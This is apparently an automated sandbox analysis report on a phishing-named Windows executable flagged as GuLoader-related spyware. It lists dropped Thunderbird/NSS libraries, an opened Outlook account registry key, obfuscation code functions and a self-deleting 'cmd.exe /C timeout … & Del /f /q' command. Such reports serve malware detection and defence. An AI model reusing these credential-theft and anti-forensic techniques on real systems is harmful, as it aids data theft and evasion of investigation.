Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasui vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasui. vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasuiw vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000000.651225218.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854463696.000000006D2BB000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854151367.000000006D162000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853350592.000000001E180000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000000.797569198.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853312694.000000001E010000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853293961.000000001DEC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853337212.000000001E160000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Uses 32bit PE files
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/67@2/3
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Mutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\Local\Temp\~DF4AE595A1013A60B4.TMP Jump to behavior
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.4.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: unknown Process created: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process created: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager Jump to behavior
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
PE file contains sections with non-standard names
Source: sqlite3.dll.4.dr Static PE information: section name: /4
Source: sqlite3.dll.4.dr Static PE information: section name: /19
Source: sqlite3.dll.4.dr Static PE information: section name: /31
Source: sqlite3.dll.4.dr Static PE information: section name: /45
Source: sqlite3.dll.4.dr Static PE information: section name: /57
Source: sqlite3.dll.4.dr Static PE information: section name: /70
Source: sqlite3.dll.4.dr Static PE information: section name: /81
Source: sqlite3.dll.4.dr Static PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2613 push edx; ret 0_2_005D2641
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D1054 push edx; ret 0_2_005D1081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2854 push edx; ret 0_2_005D2881
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D4054 push edx; ret 0_2_005D4081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5854 push edx; ret 0_2_005D5881
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D7054 push edx; ret 0_2_005D7081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6844 push edx; ret 0_2_005D6871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0843 push edx; ret 0_2_005D0871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2043 push edx; ret 0_2_005D2071
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3843 push edx; ret 0_2_005D3871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5043 push edx; ret 0_2_005D5071
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0878 push edx; ret 0_2_005D08A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6875 push edx; ret 0_2_005D68A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2074 push edx; ret 0_2_005D20A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3874 push edx; ret 0_2_005D38A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5074 push edx; ret 0_2_005D50A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0068 push edx; ret 0_2_005D0091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6065 push edx; ret 0_2_005D6091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3063 push edx; ret 0_2_005D3091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D1863 push edx; ret 0_2_005D1891
